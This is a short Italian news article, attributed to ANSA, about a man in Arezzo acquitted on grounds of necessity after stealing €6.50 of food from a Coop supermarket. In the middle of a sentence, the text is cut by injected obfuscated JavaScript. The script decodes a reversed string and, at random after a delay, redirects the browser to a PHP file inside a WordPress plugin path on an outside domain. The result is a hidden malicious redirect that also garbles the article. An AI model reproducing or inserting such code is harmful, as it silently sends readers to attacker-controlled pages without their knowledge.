Stato di necessità: assolto dopo aver rubato per fame alla Coop

image_pdfimage_print

Ruba per necessità, il giudice lo assolve. E’ accaduto ad Arezzo. Protagonista della storia un uomo di 61 anni, di origine romena, ‘affamato’, sorpreso a rubare in un supermercato della Coop due barrette di cioccolata, un pezzetto di formaggio e uno di pancetta, per un totale di sei euro e cinquanta centesimi. L’uomo viene fermato dagli addetti alla sicurezza che chiamano le forze dell’ordine e lo fanno arrestare.

La vicenda è approdata stamani in tribunale ad Arezzo, davanti al giudice Giampiero Mantellassi. In aula il pm Bernardo Albergotti ha chiesto la condanna ad un mese e 50 giorni. Il giudice, dopo aver ascoltato i fatti, ha preparato un’elaborata sentenza in cui appell (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andosi all’esimente dell’articolo 54 ovvero lo stato di necessità, ha assolto l’imputato.

Fonte Ansa

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *